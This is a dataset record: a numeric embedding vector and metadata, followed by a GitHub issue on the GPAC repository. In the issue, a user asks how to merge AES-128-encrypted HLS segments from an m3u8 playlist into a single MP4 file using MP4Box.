0.003928060177713633, 0.028019269928336143, 0.008754345588386059, 0.007836011238396168, -0.001433641416952014, 0.01726737804710865, -0.005241882521659136, -0.02901133894920349, 0.002763383788987994, -0.009431366808712482, 0.005801597610116005, -0.013191847130656242, 0.030030222609639168, 0.0047525507397949696, -0.010624531656503677, 0.005154740996658802, 0.0037504262290894985, -0.009712900035083294, -0.0022455635480582714, -0.0065758139826357365, 0.008875003084540367, 0.02984253317117691, -0.01832647994160652, 0.0010247478494420648, -0.015953555703163147, -0.01296393945813179, -0.011442318558692932, -0.02551228180527687, 0.008258311077952385, 0.025378217920660973, -0.008151059970259666, -0.0009107938385568559, 0.00030855549266561866, 0.0012568451929837465, -0.013292395509779453, 0.007929855026304722, 0.006683065090328455, 0.0031588710844516754, 0.013493490405380726, 0.005560283083468676, 0.0014277761802077293, 0.029413530603051186, 0.018031539395451546, 0.005379297770559788, 0.001783044426701963, 0.009578836150467396, -0.030459225177764893, -0.022978482767939568, -0.019331954419612885, 0.006917675957083702, -0.0003646945988293737, -0.022133883088827133, 0.012789657339453697, 0.007004817482084036, 0.005453032441437244, 0.0000628422640147619, 0.0002050752518698573, 0.000334530312102288, 0.00884148757904768, -0.01264218706637621, -0.0045011816546320915, 0.009779931977391243, 0.011060237884521484, -0.008640391752123833, -0.004782714881002903, -0.004960349295288324, 0.0010012866696342826, 0.0015467575285583735, 0.004357063211500645, 0.010644640773534775, 0.005499954801052809, -0.004967052489519119, -0.003817457938566804, 0.012870094738900661, -0.025820627808570862, 0.016690904274582863, -0.0036565817426890135, -0.015470926649868488, 0.004450907930731773, -0.012689108960330486, 0.008761049248278141, 0.01742825284600258, 0.01770978793501854, -0.020498307421803474, 0.009974324144423008, -0.003509111935272813, -0.019466018304228783, -0.01859460584819317, 0.00939785037189722, -0.014277761802077293, -0.015189393423497677, 0.0014864288968965411, 0.008667204529047012, -0.027054011821746826, -0.0029695064295083284, 0.01254834234714508, -0.02279079332947731, -0.026088755577802658, -0.004548104014247656, 0.017414847388863564, 0.025726784020662308, 0.01257515512406826, 0.03641164302825928, 0.026504352688789368, -0.000017124515579780564, 0.013158331625163555, 0.005201663356274366, -0.02992297150194645, 0.006481969729065895, 0.0015350269386544824, 0.03067372739315033, -0.0009669329156167805, -0.005107819102704525, 0.003157195169478655, -0.008948737755417824, -0.00988047942519188, -0.003938115201890469, -0.014894453808665276, -0.031933922320604324, 0.005107819102704525, 0.003371696686372161, 0.010745189152657986, 0.005959121976047754, 0.006542298477143049, 0.02095412276685238, 0.008432593196630478, 0.014103478752076626, -0.004088936373591423, 0.008177872747182846, -0.0007524313405156136, 0.004357063211500645, 0.013848758302628994, -0.001235059928148985, -0.008875003084540367, 0.014854234643280506, 0.011857915669679642, -0.0014596162363886833, -0.022308165207505226, -0.04976436868309975, 0.006109943613409996, 0.006052966695278883, -0.004243109375238419, 0.006254062056541443, -0.01197857316583395, 0.00846610963344574, 0.004568213596940041, 0.038154467940330505, 0.0008848190191201866, -0.0038945444393903017, 0.0034688927698880434, 0.011663523502647877, -0.014116885140538216, 0.001292036846280098, 0.004279976710677147, 0.0070316302590072155, -0.008895112201571465, 0.008358858525753021, 0.005959121976047754, 0.013077893294394016, -0.03196073696017265, 0.019667113199830055, 0.0188493262976408, -0.0022472392302006483, -0.008948737755417824, 0.007903043180704117, -0.0012048956705257297, 0.004477720707654953, 0.01876888796687126, 0.00917664635926485, -0.0001890504645416513, 0.0013565549161285162, -0.010597718879580498, -0.0013330938527360559, 0.014814015477895737, 0.001077535329386592, -0.007313163485378027, -0.012394169345498085, 0.007728760130703449, 0.018634825944900513, -0.005721159279346466, -0.0013909087283536792, 0.00001974294355022721, -0.016583653166890144, 0.003974982537329197, 0.006481969729065895, -0.003911302424967289, -0.039575543254613876, 0.03700152412056923, 0.012762844562530518, -0.003780590370297432, -0.0029963189736008644, 0.026866324245929718, 0.015953555703163147, -0.0006355447112582624, -0.007286350708454847, 0.0017227159114554524, 0.019063828513026237, -0.019331954419612885, 0.010135199874639511, -0.018554387614130974, -0.033354997634887695, 0.014612920582294464, 0.0013154980260878801, -0.027161262929439545, -0.006673010066151619, 0.004286679904907942, -0.00689086364582181, -0.026276445016264915, -0.01024245098233223, 0.005717807915061712, -0.023005295544862747, 0.019975459203124046, 0.015873117372393608, 0.008807971142232418, 0.005922254640609026, -0.007996886968612671, -0.008097434416413307, -0.009183349087834358, -0.007514258846640587, -0.006931082345545292, -0.0027298678178340197, -0.007172396872192621, -0.003907950595021248, 0.01693221926689148, 0.01193835400044918, 0.013466677628457546, -0.009719602763652802, -0.00845270324498415, 0.015229612588882446, 0.013446568511426449, 0.02839464694261551, 0.026906542479991913, 0.04193506017327309, 0.011127269826829433, 0.007018223870545626, 0.025699971243739128, 0.004373821429908276, -0.00807732529938221, -0.010644640773534775, 0.01832647994160652, -0.009632461704313755, -0.010423436760902405, 0.02037765085697174, 0.0008395726326853037, -0.01859460584819317, -0.005218421574681997, -0.01934536173939705, -0.006347906310111284, -0.019398987293243408, -0.006451805587857962, 0.01332591101527214, 0.021745098754763603, -0.0012157883029431105, 0.004776011686772108, 0.013513599522411823, -0.019492831081151962, -0.007601399905979633, 0.0016481430502608418, -0.0055837444961071014, 0.009009066969156265, -0.021021155640482903, 0.010718376375734806, -0.0035057603381574154, 0.01779022440314293, -0.0066529009491205215, 0.01016201265156269, -0.022938262671232224, -0.0025656400248408318, -0.018675044178962708, -0.0034621895756572485, 0.013513599522411823, -0.009733009152114391, -0.024922402575612068, 0.03402531519532204, 0.022361790761351585, 0.0161814633756876, 0.008580063469707966, -0.014291168190538883, 0.0022137234918773174, 0.021691473200917244, 0.012400873005390167, 0.023997364565730095, 0.005871980916708708, -0.0052050151862204075, -0.00013552981545217335, -0.006267467979341745, -0.019090641289949417, 0.0025220694951713085, -0.012729328125715256, 0.0011009963927790523, 0.020551932975649834, 0.005201663356274366, -0.016355745494365692, 0.013600741513073444, -0.006709877867251635, -0.014519075863063335, -0.000976987648755312, -0.01371469534933567, 0.003056647488847375, -0.008687314577400684, -0.01895657740533352, 0.015551364980638027, 0.00043947689118795097, 0.008935331366956234, 0.00019104046805296093, 0.025498876348137856, 0.010222340933978558, -0.007279647514224052, -0.026490945369005203, 0.012622077949345112, 0.017615942284464836, -0.016891999170184135, 0.011167488992214203, -0.020256994292140007, 0.00016789358051028103, 0.003974982537329197, 0.00280360272154212, 0.007641619071364403, 0.013567225076258183, -0.003817457938566804, 0.0005144686438143253, -0.017146719619631767, -0.013969415798783302, -0.014344793744385242, -0.014197323471307755, -0.007293053902685642, 0.019385579973459244, -0.010101684369146824, 0.02717467024922371, 0.010725079104304314, -0.0021249062847346067, -0.03150492161512375, 0.004414040595293045, 0.01301756501197815, 0.0061401077546179295, -0.011690336279571056, 0.01742825284600258, -0.001694227335974574, 0.025914473459124565, 0.010141902603209019, -0.009712900035083294, 0.006971301510930061, 0.016342340037226677, -0.0020059249363839626, -0.01020223181694746, 0.018313072621822357, -0.01081222016364336, -0.0009309033630415797, 0.0225092601031065, 0.002726516220718622, -0.009598946198821068, -0.014505669474601746, -0.030915040522813797, -0.011569678783416748, 0.0027751142624765635, -0.00022560371144209057, -0.02185234986245632, 0.004011849872767925, 0.006290929391980171, -0.010034652426838875, 0.003282879712060094, -0.011583085171878338, 0.007259537931531668, 0.014948079362511635, 0.009431366808712482, 0.002860579639673233, 0.021007748320698738, 0.008921924978494644, 0.016664091497659683, 0.00279019633308053, -0.008533141575753689, -0.008586766198277473, -0.035124633461236954, 0.00019093573791906238, 0.007192506454885006, -0.0027499774005264044, -0.001495645847171545, 0.005422868300229311, -0.014371606521308422, -0.006093185860663652, 0.017414847388863564, -0.019117454066872597, -0.024466587230563164, -0.017039470374584198, 0.004122452344745398, 0.00982685387134552, -0.015417301096022129, 0.011810993775725365, 0.010410030372440815, 0.010765298269689083, -0.023769456893205643, -0.003157195169478655, -0.0009376065572723746, 0.0016674146754667163, -0.03383762389421463, -0.013332613743841648, 0.0036264173686504364, -0.0372428372502327, -0.0022824308834969997, -0.0036364721599966288, 0.016583653166890144, 0.0011001585517078638, 0.013862164691090584, 0.024466587230563164, 0.0008085704175755382, 0.006944488734006882, -0.0007222670828923583, 0.007138880901038647, 0.02009611763060093, -0.00907609798014164, -0.009940807707607746, -0.007112068124115467, -0.005007271189242601, -0.01662387326359749, -0.007929855026304722, 0.00007761019514873624, 0.004876559600234032, -0.019278330728411674, -0.01607421226799488, -0.00306335068307817, 0.004869856406003237, -0.0014579404378309846, 0.010658047161996365, -0.006200436502695084, 0.001196516677737236, 0.029547592625021935, 0.0034052126575261354, 0.009974324144423008, -0.011851212941110134, 0.021825537085533142, -0.02403758466243744, -0.015015111304819584, -0.00650207931175828, 0.010041355155408382, 0.01856779307126999, 0.010034652426838875, -0.02714785747230053, -0.0006866564508527517, -0.006187030114233494, 0.02728191949427128, -0.010262560099363327, -0.001326390658505261, -0.012910313904285431, -0.024158241227269173, 0.0005375107866711915, -0.012206480838358402, 0.006468563340604305, -0.009009066969156265, 0.009846962988376617, 0.004832988604903221, -0.0011822724482044578, 0.006535595282912254, 0.03375718742609024, -0.009169942699372768, 0.018058352172374725, 0.003817457938566804, -0.002242211950942874, 0.015484333038330078, 0.007460633292794228, 0.019693925976753235, -0.01685178093612194, 0.013453271239995956, -0.006321093533188105, 0.0066495491191744804, 0.01018882542848587, -0.0033046649768948555, -0.0023511385079473257, 0.00043780109263025224, -0.006485321559011936, -0.0055770413018763065, 0.007929855026304722, -0.007970074191689491, 0.039709605276584625, -0.0098536666482687, 0.00236957217566669, 0.024211866781115532, 0.01235395111143589, 0.019613489508628845, 0.00916323997080326, 0.013386239297688007, -0.009974324144423008, 0.009096208028495312, -0.008995660580694675, -0.006257413420826197, 0.0040453658439219, -0.010128497146070004, 0.01726737804710865, -0.0008873327169567347, -0.004789418075233698, -0.008620282635092735, 0.0028237123042345047, -0.020176555961370468, 0.02745620347559452, 0.013540412299335003, -0.00030583233456127346, -0.00807732529938221, -0.029359905049204826, 0.0005241044564172626, 0.006032857112586498, -0.023528141900897026, 0.005104467272758484, -0.022857824340462685, 0.005838464945554733, 0.024976028129458427, -0.012997454963624477, 0.0027935479301959276, -0.023380672559142113, -0.0058183553628623486, -0.016677498817443848, -0.0014009635196998715, -0.0024299006909132004, -0.014921266585588455, 0.01757572405040264, -0.009940807707607746, -0.020753027871251106, -0.026155786588788033, -0.005546876695007086, -0.0063277967274188995, -0.006344554480165243, 0.020592153072357178, -0.040567610412836075, -0.007453930098563433, 0.001876888913102448, -0.009686087258160114, 0.02162444032728672, 0.006709877867251635, 0.010262560099363327, -0.013466677628457546, 0.006622736342251301, 0.0017713138367980719, -0.018581200391054153, 0.000012018582310702186, -0.00981344748288393, -0.0033046649768948555, -0.017562316730618477, -0.034213002771139145, -0.012521529570221901, 0.01083903294056654, 0.0035225183237344027, -0.00001493812942499062, -0.004675464238971472, -0.0012266809353604913, -0.008633689023554325, 0.029252653941512108, -0.0016112755984067917, 0.027389170601963997, 0.009699493646621704, 0.0066428459249436855, -0.012400873005390167, -0.0037772387731820345, 0.0027600321918725967, 0.0010255856905132532, 0.017334409058094025, 0.005499954801052809, -0.009927401319146156, 0.0023109193425625563, -0.010872549377381802, -0.006840589456260204, -0.010906064882874489, -0.0010884279618039727, -0.007219318766146898, 0.01087925210595131, 0.02157081477344036, 0.016556840389966965, 0.004789418075233698, -0.02009611763060093, 0.011073644272983074, 0.007259537931531668, 0.0035426276735961437, 0.00559379905462265, 0.006176975555717945, -0.003676691325381398, 0.0014051529578864574, 0.009210161864757538, -0.01301756501197815, -0.00560720544308424, 0.009471585974097252, -0.007567883934825659, 0.012742734514176846, -0.008580063469707966, 0.00988047942519188, 0.008164466358721256, -0.011361881159245968, 0.02128928154706955, -0.02512349747121334, -0.010952986776828766, 0.006619384977966547, -0.012896907515823841, 0.0015308375004678965, 0.03145129606127739, -0.021275876089930534, -0.0017344463849440217, -0.0034688927698880434, -0.007956667803227901, -0.015417301096022129, -0.012863392010331154, -0.021114999428391457, 0.008908518590033054, 0.008164466358721256, 0.024935809895396233, 0.0043704695999622345, 0.010027948766946793, 0.003904599230736494, 0.0064015318639576435, 0.01219977717846632, 0.009015769697725773, -0.008640391752123833, -0.006130053196102381, -0.006324445363134146, -0.0032007659319788218, 0.005084357690066099, -0.008378968574106693, 0.007909745909273624, 0.0017595833633095026, 0.0039917402900755405, 0.026102161034941673, -0.0063914768397808075, -0.005017326213419437, 0.005258640274405479, 0.00687745725736022, 0.011294849216938019, 0.010872549377381802, -0.000589041446801275, -0.012407575733959675, -0.004115749150514603, 0.018835920840501785, -0.006562408059835434, 0.01537708193063736, -0.00010311367805115879, -0.000780919857788831, 0.0055770413018763065, 0.003105245530605316, -0.007567883934825659, 0.003199090017005801, 0.00687745725736022, -0.0061334045603871346, -0.002465092344209552, 0.004209593404084444, 0.015350270085036755, -0.019023608416318893, 0.012052307836711407, 0.009290600195527077, 0.013225363567471504, -0.008968847803771496, -0.005027380771934986, -0.012668999843299389, 0.006743393372744322, -0.0031203278340399265, -0.0015224585076794028, -0.004507884848862886, -0.01890295185148716, 0.015645209699869156, -0.008573359809815884, 0.021664660423994064, -0.009042582474648952, -0.0045749167911708355, 0.001920459559187293, -0.015645209699869156, -0.003767183981835842, 0.01799132116138935, -0.0037202618550509214, 0.033328182995319366, -0.01254834234714508, -0.005154740996658802, -0.014438637532293797, 0.007138880901038647, -0.003904599230736494, -0.01765616238117218, 0.022562885656952858, 0.0014755362644791603, 0.009940807707607746, 0.002709758235141635, -0.022334977984428406, -0.008647095412015915, 0.029520779848098755, 0.004098991397768259, -0.011475834995508194, 0.02201322466135025, -0.008559953421354294, -0.006414938252419233, 0.008613578975200653, 0.01960008218884468, 0.005442977882921696, -0.00527539849281311, -0.0017796928295865655, -0.003225902793928981, -0.022187506780028343, 0.016556840389966965, 0.030941853299736977, -0.03233611211180687, 0.010986503213644028, -0.005493251606822014, -0.001237573567777872, 0.003489002352580428, 0.004896669182926416, -0.01576586626470089, 0.0014788878615945578, -0.010745189152657986, 0.001653170445933938, 0.0012568451929837465, 0.011026722379028797, 0.0034755959641188383, 0.01121441088616848, -0.009169942699372768, 0.005875332280993462, 0.006709877867251635, -0.004353711847215891, 0.03075416386127472, -0.0029778853058815002, 0.003219199599698186, -0.014948079362511635, 0.0018785647116601467, -0.005546876695007086, -0.008016997016966343, -0.012119339779019356, 0.0058250585570931435, -0.006984707899391651, 0.013614147901535034, 0.007956667803227901, 0.012769547291100025, -0.0023209741339087486, -0.012896907515823841, -0.024976028129458427, -0.006612681783735752, 0.008459405973553658, 0.010503874160349369, 0.0073936013504862785, -0.027214888483285904, 0.012541639618575573, 0.0012107609072700143, -0.008378968574106693, 0.001531675341539085, 0.017079688608646393, -0.0005349970888346434, 0.009250381030142307, -0.017280783504247665, 0.010356404818594456, 0.027831580489873886, -0.018286259844899178, 0.018500762060284615, 0.020967530086636543, -0.03241655230522156, 0.014304574579000473, 0.006331148557364941, 0.004450907930731773, 0.010872549377381802, -0.013996228575706482, 0.0008797916816547513, 0.0122265899553895, -0.02820695750415325, 0.01193835400044918, 0.009009066969156265, -0.017307596281170845, 0.00192213524132967, 0.012320434674620628, -0.0014713468262925744, 0.011073644272983074, 0.023742644116282463, 0.0006007720367051661, 0.00938444398343563, -0.011107159778475761, -0.025887660682201385, 0.0080907316878438, -0.009692789986729622, -0.009417960420250893, -0.0024533618707209826, -0.01640937104821205, 0.020189961418509483, -0.017039470374584198, 0.0009250380680896342, -0.026852916926145554, 0.005791542585939169, -0.01565861515700817, -0.016168056055903435, -0.010885955765843391, -0.01257515512406826, 0.010678157210350037, -0.009612352587282658, 0.00244330707937479, -0.0024667682591825724, 0.018755482509732246, -0.013620850630104542, 0.009739712812006474, -0.03233611211180687, -0.0009803392458707094, -0.004652003291994333, -0.04099661484360695, 0.007929855026304722, -0.010128497146070004, -0.015108955092728138, -0.004672112874686718, -0.00843929685652256, 0.005238530691713095, -0.022750575095415115, -0.01721375249326229, 0.0028555523604154587, -0.00880126841366291, -0.006146810948848724, 0.009927401319146156, -0.001808181288652122, 0.006984707899391651, -0.025780409574508667, -0.0057044015266001225, -0.00384427048265934, -0.0021081482991576195, 0.017535503953695297, 0.0030398897361010313, 0.0040017953142523766, 0.016382558271288872, 0.0023712480906397104, 0.0040017953142523766, -0.003924708813428879, 0.007641619071364403, 0.023112546652555466, -0.023273421451449394, -0.0070316302590072155, 0.019331954419612885, -0.001858455128967762, 0.0035493308678269386, -0.019948648288846016, -0.00803710613399744, 0.016717717051506042, -0.003954872954636812, 0.019479425624012947, -0.012427685782313347, 0.005412813276052475, 0.0009828530019149184, 0.027777954936027527, -0.012038901448249817, 0.0010096656624227762, 0.02053852751851082, -0.005533470772206783, 0.002545530442148447, -0.0015945176128298044, -0.012970643118023872, 0.014023041352629662, -0.00045330217108130455, -0.008834783919155598, 0.00491342693567276, 0.001673279912211001, -0.006451805587857962, 0.018313072621822357, 0.00845270324498415, -0.02606194280087948, -0.001838345662690699, -0.001417721388861537, 0.006173623725771904, -0.014626326970756054, 0.013319207355380058, -0.003225902793928981, 0.009665977209806442, -0.010423436760902405, -0.008613578975200653, -0.0006422479054890573, -0.008177872747182846, -0.0025287726894021034, -0.009203458204865456, 0.02209366299211979, 0.02989615872502327, -0.015243018977344036, -0.010671453550457954, 0.002463416662067175, -0.04029948636889458, 0.0010716699762269855, -0.020806653425097466, -0.013547115959227085, 0.008513031527400017, 0.008908518590033054, -0.01968052051961422, 0.008499625138938427, -0.0259010661393404, 0.002111499896273017, 0.007990184240043163, 0.00255726114846766, -0.007091958541423082, -0.017495285719633102, -0.0025622884277254343, -0.001992518547922373, -0.0000217722244997276, -0.008419186808168888, -0.011737258173525333, -0.03753777593374252, 0.00017690096865408123, 0.00323763326741755, 0.006244007032364607, -0.010725079104304314, 0.00026226171758025885, -0.017951101064682007, -0.019023608416318893, -0.03936104103922844, 0.011683633551001549, 0.015229612588882446, 0.019640302285552025, -0.0005618098075501621, 0.027885206043720245, 0.01153616327792406, -0.021074781194329262, 0.00907609798014164, -0.015015111304819584, 0.023836487904191017, -0.010249153710901737, -0.004125803709030151, -0.023045513778924942, 0.018004726618528366, 0.0027935479301959276, -0.0024852019269019365, 0.003509111935272813, -0.0068271830677986145, 0.013527005910873413, 0.0042598675936460495, 0.0009652571170590818, -0.0031303823925554752, 0.01378172729164362, -0.0036565817426890135, 0.0055200643837451935, 0.01092617493122816, -0.00872753281146288, 0.014612920582294464, -0.001591166015714407, 0.01657024770975113, -0.00010756500705610961, 0.013265582732856274, 0.03544638678431511, 0.007373491767793894, 0.0274830162525177, 0.005791542585939169, -0.01998886652290821, 0.003400185378268361, 0.016007181257009506, -0.005865277722477913, 0.027442796155810356, 0.006190381478518248, 0.025498876348137856, -0.00236957217566669, 0.0008429241715930402, -0.0016933894949033856, -0.016261901706457138, -0.011408803053200245, -0.022174101322889328, -0.009196755476295948, 0.003519166726619005, -0.007655025459825993, 0.01607421226799488, 0.011697039939463139, -0.00650207931175828, -0.020699402317404747, -0.007407007738947868, -0.008318639360368252, 0.035071007907390594, 0.0015702185919508338, -0.008345452137291431, 0.012072416953742504, 0.03641164302825928, 0.0031303823925554752, -0.017052875831723213, 0.0028253879863768816, 0.022308165207505226, 0.005758027080446482, 0.00421964842826128, -0.01998886652290821, 0.004846394993364811, 0.003881138050928712, 0.0019321900326758623, -0.011455724947154522, 0.02356836199760437, 0.028046082705259323, 0.005985934752970934, -0.01701265759766102, 0.012132746167480946, 0.02600831724703312, 0.013808539137244225, 0.005493251606822014, 0.010517280548810959, 0.00988047942519188, -0.0020260345190763474, 0.0017227159114554524, 0.008982254192233086, 0.009216864593327045, 0.028850462287664413, 0.006592572201043367, 0.025767002254724503, 0.0033180713653564453, 0.008915222249925137, 0.005091060884296894, 0.017522098496556282, 0.00300469808280468, -0.017052875831723213, -0.0030063737649470568, 0.011730555444955826, 0.016999250277876854, 0.021664660423994064, 0.006187030114233494, 0.0003221713122911751, 0.00017438727081753314, 0.004169374704360962, -0.009498398751020432, 0.019305143505334854, 0.018259447067975998, -0.01773660071194172, 0.004487775266170502, -0.009143129922449589, 0.016007181257009506, -0.0021366369910538197, -0.007923152297735214, -0.0018685099203139544, -0.014706765301525593, 0.02084687352180481, 0.037323277443647385, 0.006746745202690363, 0.020779840648174286, 0.009431366808712482, -0.0018735373159870505, -0.019331954419612885, -0.022562885656952858, 0.031987547874450684, -0.0028823651373386383, -0.003824161132797599, -0.010510577820241451, -0.013386239297688007, 0.009927401319146156, -0.02276398055255413, 0.006776909343898296, -0.0024835262447595596, 0.024359336122870445, 0.028662774711847305, -0.017200345173478127, 0.003978333901613951, 0.006056318059563637, -0.026128973811864853, 0.008566657081246376, 0.0005203339387662709, 0.0031706015579402447, 0.014894453808665276, -0.0048162308521568775, -0.024144833907485008, 0.003951521590352058, -0.0013707991456612945, 0.007252834737300873, 0.012776250950992107, -0.033408623188734055, -0.0181253831833601, -0.011857915669679642, -0.005972528364509344, -0.012320434674620628, 0.009511804208159447, 0.013299098238348961, 0.015202799811959267, -0.016302119940519333, 0.0033867789898067713, 0.020659184083342552, -0.011717149056494236, -0.0033851030748337507, -0.01378172729164362, 0.0013372832909226418, 0.006726635619997978, 0.012461201287806034, 0.006183678284287453, -0.01571224071085453, -0.00029095966601744294, -0.0040017953142523766, 0.010430139489471912, 0.010249153710901737, 0.023367267102003098, -0.0088146748021245, 0.013835351914167404, 0.007413710933178663, 0.005422868300229311, -0.0027550046797841787, 0.03214842453598976, 0.004923481494188309, 0.024024177342653275, 0.016476403921842575, -0.015551364980638027, 0.0009711224120110273, 0.014679952524602413, -0.005111170466989279, 0.01781703718006611, 0.012059010565280914, -0.02307232655584812, 0.009665977209806442, 0.00611329497769475, 0.005238530691713095, 0.0013213632628321648, -0.013520303182303905, -0.001463805790990591, -0.0008500463445670903, 0.022227726876735687, 0.010859142988920212, -0.008244904689490795, -0.015269831754267216, 0.010973096825182438, 0.00630098395049572, 0.010443545877933502, -0.012045604176819324, 0.01843372918665409, 0.005664182361215353, -0.005439626052975655, -0.008720830082893372, -0.014478856697678566, -0.028850462287664413, 0.009223568253219128, 0.018916359171271324, 0.008097434416413307, -0.019693925976753235, 0.00886830035597086, 0.0005789867136627436, -0.003214172087609768, 0.0036331205628812313, -0.0001273603120353073, 0.0022874583955854177, 0.04088936373591423, 0.00559379905462265, 0.01659706048667431, 0.0021768559236079454, 0.017307596281170845, 0.029359905049204826, -0.009216864593327045, -0.004514588043093681, -0.01261537428945303, 0.009082801640033722, -0.003653230145573616, -0.006833886262029409, -0.002084687352180481, 0.0046385969035327435, -0.040621235966682434, -0.008821377530694008, -0.014907860197126865, 0.02914540283381939, 0.00945147592574358, 0.02287123166024685, 0.010624531656503677, -0.011790883727371693, 0.008881705813109875, 0.014371606521308422, 0.0038576768711209297, -0.003874434856697917, 0.015430707484483719, 0.00002147110535588581, -0.01200538594275713, 0.010001135990023613, -0.019090641289949417, 0.03920016437768936, -0.005855223163962364, 0.004212945234030485, 0.019037015736103058, -0.0023410837166011333, 0.007125474512577057, 0.0006242331000976264, -0.010503874160349369, -0.03445431590080261, 0.024614056572318077, 0.019077233970165253, 0.002171828644350171, 0.013587335124611855, -0.011878025718033314, -0.004383875988423824, 0.0073466794565320015, 0.005878684110939503, -0.03303324431180954, -0.001543405931442976, -0.009505101479589939, 0.02431911788880825, 0.01734781637787819, 0.030057035386562347, 0.0013959361240267754, 0.03129041939973831, 0.02136971987783909, 0.014612920582294464, 0.016744529828429222, 0.010999909602105618, -0.031987547874450684, 0.010691563598811626, -0.005737917497754097, 0.01929173618555069, 0.011884728446602821, 0.01120100449770689, -0.002961127320304513, 0.017750006169080734, 0.015055329538881779, 0.010168715380132198, -0.030110659077763557, 0.025753596797585487, 0.0032476880587637424, -0.006394828669726849, -0.003566088853403926, 0.004601729102432728, 0.01823263429105282, -0.013098003342747688, -0.014063260518014431, 0.007943261414766312, 0.007755572907626629, 0.03295280784368515, -0.0064585087820887566, -0.008352155797183514, 0.009391147643327713, -0.008405780419707298, -0.020699402317404747, 0.0033499114215373993, 0.01156297605484724, -0.017508691176772118, 0.0018752131145447493, -0.010872549377381802, -0.023420892655849457, -0.002796899527311325, -0.0019573268946260214, -0.034159377217292786, 0.02826058305799961, 0.0009744740091264248, 0.021409939974546432, -0.0015836249804124236, 0.018554387614130974, 0.0026360233314335346, -0.005476493388414383, 0.0005911362241022289, -0.012876798398792744, -0.011569678783416748, -0.012736031785607338, 0.013533709570765495, -0.0019673816859722137, -0.011321661993861198, -0.002305892063304782, 0.0008190441294573247, -0.017481878399848938, -0.010510577820241451, -0.007621509488672018, 0.007453930098563433, 0.003810754744336009, -0.01081222016364336, 0.008016997016966343, -0.024533618241548538, 0.007199209649115801, 0.012092527002096176, 0.014317980967462063, -0.005305562634021044, 0.002186910714954138, 0.0056407214142382145, -0.0053826491348445415, 0.0075879935175180435, 0.012481311336159706, -0.001397611922584474, 0.005034083966165781, -0.010235747322440147, 0.00494023971259594, -0.010778704658150673, 0.010349701158702374, 0.001865158323198557, -0.023528141900897026, -0.018313072621822357, -0.02478833869099617, 0.0003552682464942336, -0.013466677628457546, 0.014840828254818916, 0.008707423694431782, -0.009169942699372768, 0.011898134835064411, -0.008942035026848316, -0.010316185653209686, 0.001865158323198557, 0.011469131335616112, 0.0041291555389761925, -0.0059457155875861645, -0.006368015892803669, -0.004578268155455589, 0.034266628324985504, 0.014358200132846832, 0.0016699283150956035, 0.002406439743936062, 0.013466677628457546, -0.009665977209806442, -0.006290929391980171, 0.025834035128355026, -0.019385579973459244, -0.009029176086187363, -0.019398987293243408, 0.007849417626857758, -0.005030732601881027, 0.0167713426053524, 0.007132177706807852, -0.013513599522411823, 0.008318639360368252, -0.003529221285134554, -0.020243586972355843, 0.06772887706756592, -0.008372264914214611, -0.009029176086187363, -0.024225272238254547, -0.007903043180704117, 0.002822036389261484, -0.0160473994910717, -0.014304574579000473, -0.02919902838766575, 0.04064805060625076, 0.0116166016086936, 0.01954645663499832, -0.004152616485953331, 0.001990842865779996, 0.007567883934825659, 0.007413710933178663, -0.004782714881002903, -0.040567610412836075, 0.0035124635323882103, 0.00020423735259100795, 0.006317742168903351, -0.009954214096069336, 0.014116885140538216, 0.021074781194329262, -0.005546876695007086, -0.008157763630151749, 0.007487446069717407, 0.006998114287853241, -0.018701856955885887, -0.003116976236924529, 0.021047968417406082, 0.0010012866696342826, -0.014881047420203686, 0.019841397181153297, 0.0033733726013451815, -0.00005462039916892536, -0.0019992217421531677, 0.0021198790054768324, 0.028796838596463203, -0.0017361221835017204, 0.005801597610116005, -0.0034487831871956587, 0.029252653941512108, 0.01083903294056654, -0.0013934223679825664, -0.025914473459124565, -0.006052966695278883, 0.009149833582341671, -0.013413052074611187, -0.005198311991989613, -0.004145913291722536, 0.008184576407074928, -0.01796450838446617, -0.015296644531190395, -0.0004516263725236058, 0.006699822843074799, -0.014130291528999805, -0.0005882035475224257, 0.011971869505941868, -0.006823831703513861, -0.0075879935175180435, -0.014934672974050045, -0.0007666755700483918 ]
2,046
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Hello, It might not be an issue but I was wondering if it's possible to actually merge those segments of similar m3u8 as : https://content-ause2-ur-discovery1.uplynk.com/ce6f6a0e4c0c440ca22f05e5e14a82a4/f.m3u8?pbs=294fa09c22a04e4fba447b20c5ee7f0c into one mp4. Those segments are AES 128 encrypted with IV in every segment. I tried using MP4Box following what was written in here "https://github.com/gpac/gpac/issues/1236" but I was unsuccessful with it. Any Help would be appreciated. Thanks in advance
Unable to merge segments to mp4
https://api.github.com/repos/gpac/gpac/issues/1679/comments
1
2021-01-12T03:17:46
2021-01-14T11:44:05Z
https://github.com/gpac/gpac/issues/1679
783,872,386
1,679
false
This is a GitHub Issue repo:gpac owner:gpac Title : Unable to merge segments to mp4 Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Hello, It might not be an issue but I was wondering if it's possible to actually merge those segments of similar m3u8 as : https://content-ause2-ur-discovery1.uplynk.com/ce6f6a0e4c0c440ca22f05e5e14a82a4/f.m3u8?pbs=294fa09c22a04e4fba447b20c5ee7f0c into one mp4. Those segments are AES 128 encrypted with IV in every segment. I tried using MP4Box following what was written in here "https://github.com/gpac/gpac/issues/1236" but I was unsuccessful with it. Any Help would be appreciated. Thanks in advance --- end body ---
1,276
